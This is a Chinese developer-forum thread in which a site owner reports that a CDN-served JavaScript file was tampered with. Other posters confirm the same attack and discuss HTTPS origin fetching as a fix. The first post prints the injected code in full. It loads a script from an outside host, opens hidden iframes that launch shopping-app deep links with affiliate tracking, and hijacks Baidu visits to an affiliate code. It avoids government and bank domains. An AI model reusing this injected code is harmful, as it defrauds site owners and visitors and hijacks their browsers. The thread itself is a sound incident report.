一个恶心的劫持 CDN 静态资源返回被篡改

2019-03-06 16:59:32 +08:00
 Moker

今天上午接到其他地区同事反馈说网站点击按钮没反应,于是自己试了下,手机和电脑都没有问题。下午的时候发现,自己这边也开始出现问题了,排查后发现某个静态 js 资源被篡改了,完全和源数据不一样。


(function(){var l=document.createElement('script');l.src='https://gov.papastars.com/dlhao.min.js';document.getElementsByTagName('body')[0].appendChild(l);})();(function(){var l=document.createElement('script');l.src='http://xxxxx//static/js/7.js';document.getElementsByTagName('body')[0].appendChild(l);})();

之后会被引入 dlhao.min.js ,然后在跳转回源,不过估计没写好吧,跳转应该是要 https。


!function() {
    var e = ["https://gov.papastars.com/usany.min.html", 'openapp.jdmobile://virtual?params={"category":"jump","des":"m","url":"https://u.jd.com/1jEOCf","keplerID":"0","keplerFrom":"1","kepler_param":{"source":"kepler-open","otherData":{"mopenbp7":"0"}},"union_open":"union_cps"}', "vipshop://goHome?tra_from=tra%3AC01V006ijfbdtqnu%3A%3Amig_code%3Acps101%3A1cf9efd0abf84e8c94b7e1c01ebe7b2b", "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&h5Url=https%3A%2F%2Fh5.m.taobao.com%2Fbcec%2Fdahanghai-jump.html%3Fspm%3D2014.ugdhh.3907731441.1217-279%26bc_fl_srcgrowth_dhh_3907731441_1217-279&spm=2014.ugdhh.3907731441.1217-279&bc_fl_src=growth_dhh_3907731441_1217-279&materialid=1217", "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=sxmhx&src_ch=sxmhx42&src_scene=pullup&url=ext%3Ainfo_flow_open_channel%3Ach_id%3D100%26insert_item_ids%3D17864229593326336693%26type%3Dmultiple%26from%3D6001", "youku://weex?source=00002204&url=https%3A%2F%2Fmarket.m.taobao.com%2Fyep%2Fweexmaker%2Fykpage%2Fpigspring_wmdt.js%3Fwh_weex%3Dtrue%26refer%3Dsanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700&refer=sanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700"]
      , t = "y"
      , o = "dkwlsn3"
      , n = "vivi8dd"
      , r = "bbdm2lw"
      , a = .15
      , i = function(e, t) {
        var o = document.createElement("iframe");
        o.setAttribute("width", "1px"),
        o.setAttribute("height", "1p"),
        o.setAttribute("frameborder", "0"),
        o.setAttribute("scrolling", "no"),
        o.style.display = "none",
        o.setAttribute("src", e),
        document.body.appendChild(o),
        t && window.setTimeout(function() {
            document.body.removeChild(o)
        }, 3e3)
    }
      , c = function(e) {
        for (var t = e + "=", o = document.cookie.split(";"), n = 0; n < o.length; n++) {
            for (var r = o[n]; " " == r.charAt(0); )
                r = r.substring(1);
            if (-1 != r.indexOf(t))
                return r.substring(t.length, r.length)
        }
        return ""
    }
      , m = function(e, t, o) {
        var n = new Date
          , r = n.getTime();
        r += 3600 * o * 1e3,
        n.setTime(r),
        document.cookie = e + "=" + t + "; expires=" + n.toUTCString() + "; path=/"
    };
    !function(e, u) {
        var s = function(e, t) {
            if (e) {
                e = e.toLowerCase();
                for (var o in t)
                    if (e.indexOf(t[o]) > -1)
                        return !0
            }
            return !1
        }
          , h = location.host
          , p = function(e) {
            var t = new Array(".gov","haiwainet.cn","yhd.com","alipay","p.weibo.com","people","xiangha.com","adipman.net","cnr.cn","17getfun.com","shuixindk.cn","ce.cn","boc","abchina","icbc","10086","51awifi.com","hospital");
            return s(e, t) ? !1 : !0
        };
        if (p(h)) {
            if (/MicroMessenger/gi.test(u.userAgent))
                return;
            var l = c(n);
            l != t && (i(e[0], !0),
            m(n, t, .5));
            var f = Math.floor(100 * Math.random())
              , l = c(o);
            l != t && (f >= 20 && i(e[1], !0),
            80 >= f && i(e[2], !0),
            (35 > f || f > 75) && i(e[3], !0),
            u.userAgent.indexOf("UCBrowser") > -1 && Math.floor(100 * Math.random()) > 30 && i(e[4], !0),
            Math.floor(100 * Math.random()) > 50 && i(e[5], !0),
            m(o, t, a))
        }
        var d = top.location.href
          , l = c(r);
        l != t && d.length < 40 && "https://m.baidu.com/?from" == d.substring(0, 25) && "?from=1015129o" !== top.location.search && Math.floor(100 * Math.random()) > 50 && (m(r, t, a),
        top.location.href = "https://m.baidu.com/?from=1015129o")
    }(e, navigator, document, window.location)
}();


点击按钮将直接唤起淘宝之类的 app 至于哪家 CDN 就不说了 国外 VPS 测试了下 返回结果也一样

30846 次点击
所在节点    分享发现
13 条回复
v2chou
2019-03-06 17:09:59 +08:00
??? 你倒是说下啊
Moker
2019-03-06 17:13:49 +08:00
@v2chou 因为不确定就是 CDN 供应商的锅 所以说出来并不好
brainmix
2019-03-07 10:06:35 +08:00
我们也碰到这个问题了,有记录下当时 CDN 节点的 IP 吗?
Moker
2019-03-07 10:17:37 +08:00
@brainmix 没有 已经是大范围这样了 不单单是单个节点问题 包括北京深圳的同事还有用户都反应出现了这个问题
Moker
2019-03-07 10:18:33 +08:00
@brainmix 你们注入的也是同样的代码吗?
abccccabc
2019-03-07 17:28:49 +08:00
被染污了??
Moker
2019-03-07 18:10:00 +08:00
@abccccabc 感觉不像是简单的污染 一般不会劫持 cdn 回源 或者说 劫持了某个节点 然后回源同步导致问题被放大 今天又被搞了个文件 对方还换域名了
acwong
2019-03-15 18:08:29 +08:00
@brainmix 同样遇到这个问题,域名是 bank.govsbank.com/dlhao.min.js IP 是 119.28.139.45
Moker
2019-03-15 18:29:35 +08:00
@acwong 后来换域名了 变成 bank 开头了 很机智 最后你们有恢复吗?我们现在改成回源也改成 https
fzxml
2019-03-18 09:56:30 +08:00
我也碰到了..dlhao.min.js 加载不出来导致网页加载不出来..
j20120307
2019-03-19 02:39:19 +08:00
回源 https 可以

有 root cause 吗?
Moker
2019-03-19 09:32:36 +08:00
@j20120307 未知啊 反馈给 CDN 供应商 他们没回复
FaiChou
2019-07-17 17:00:53 +08:00

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/541812

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX